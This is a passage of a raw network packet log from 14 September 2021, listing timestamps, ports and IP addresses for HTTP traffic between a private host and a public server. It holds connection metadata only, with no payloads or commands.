                                  Sep 14, 2021 21:48:15.037102938 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037116051 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037122965 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037147999 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037148952 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037173033 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037173986 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037194967 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037210941 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037211895 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037226915 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037235975 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037245989 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037262917 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037265062 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037277937 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037293911 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037302971 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037323952 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037339926 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037362099 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037375927 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037384033 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037385941 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037389040 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037400961 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037414074 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037421942 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037441969 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037457943 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037470102 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037501097 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037504911 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037520885 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037590027 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037623882 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037645102 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037647963 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037681103 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037698984 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037719965 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037740946 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037759066 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037761927 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037774086 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037813902 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037822008 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037877083 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037892103 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037913084 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037936926 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037954092 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.037978888 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.037988901 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.038017035 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.038100958 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.038119078 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.038161039 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.038188934 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.038209915 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.038264990 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.038274050 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.038331032 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.039666891 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042043924 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042083025 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042107105 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042129040 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042143106 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042160988 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042169094 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042185068 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042191982 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042203903 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042222023 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042243958 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042262077 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042269945 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042274952 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042293072 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042314053 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042335987 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042337894 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042346954 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042356968 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042373896 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042378902 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042398930 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042417049 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042438984 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042447090 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042459965 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042460918 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042464972 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042484045 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042509079 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042530060 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042542934 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042551994 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042561054 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042571068 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042577028 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042601109 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042610884 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042620897 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042639017 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042643070 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042666912 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042689085 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042692900 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042711973 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042732000 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042733908 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042737007 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042757034 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042776108 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042781115 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042798042 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042802095 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042814016 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042829037 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042834997 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042844057 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042856932 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042864084 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042871952 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042887926 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042902946 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042917967 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042932987 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042941093 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042944908 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042951107 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.042957067 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042972088 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042984009 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.042999983 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043010950 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043020964 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043023109 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043029070 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043039083 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043055058 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043070078 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043078899 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043081999 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043093920 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043095112 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043106079 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043128014 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043148041 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043164015 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043179989 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043179989 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043191910 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043200970 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043209076 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043225050 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043236017 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043247938 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043262005 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043262959 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043281078 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043281078 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043298006 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043313980 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043328047 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043329000 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043344975 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043358088 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043359995 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043375969 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043391943 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043380022 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043410063 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043426991 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043426991 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043442965 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043452978 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043458939 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043474913 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043490887 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043505907 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043505907 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043521881 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043540955 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043556929 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043590069 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043608904 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043668032 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043684006 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043709040 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043735981 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043750048 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043752909 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043770075 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043795109 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043812037 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043812990 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043828964 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043833971 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043855906 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043865919 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043874025 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043888092 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043896914 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043908119 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043925047 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043925047 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043940067 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043956041 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043972969 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.043976068 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.043989897 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.044006109 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.044020891 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.044022083 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.044040918 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.044042110 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.044059038 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.044075966 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.044114113 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.058603048 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.309530973 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309561968 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309583902 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309603930 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309624910 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309648991 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309672117 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309696913 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309719086 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309741974 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309765100 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309787035 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309809923 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309834957 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309835911 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.309859037 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309880972 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309887886 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.309904099 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309926987 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.309926987 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309951067 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309961081 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.309973955 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.309986115 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.309995890 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310022116 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310029030 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310045004 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310055017 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310067892 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310089111 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310091019 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310116053 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310122967 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310137987 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310154915 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310162067 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310183048 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310184956 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310195923 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310209990 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310211897 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310235023 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310241938 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310259104 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310265064 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310282946 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310296059 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310306072 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310313940 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310329914 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310336113 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310352087 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310358047 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310374975 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310386896 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310399055 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310400009 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310424089 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310431957 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310445070 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310455084 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310467958 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310468912 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310491085 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310502052 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310518980 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310522079 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310544014 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310554028 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310566902 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310566902 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310591936 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310600996 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310617924 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310617924 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310642958 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310650110 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310663939 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310672045 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310688972 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310697079 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310712099 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310719967 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310735941 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310745001 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310759068 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310775042 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310781002 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310808897 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310822964 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310857058 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310866117 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310888052 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310890913 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310899973 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310915947 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310941935 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310944080 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310965061 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.310966015 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.310992956 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311018944 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311031103 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311043978 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311057091 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311067104 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311085939 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311093092 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311105013 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311105967 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311132908 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311146021 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311372042 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311409950 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311435938 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:15.311456919 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311460018 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.311484098 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:15.312603951 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:16.168037891 CEST4916580192.168.2.2213.238.159.178
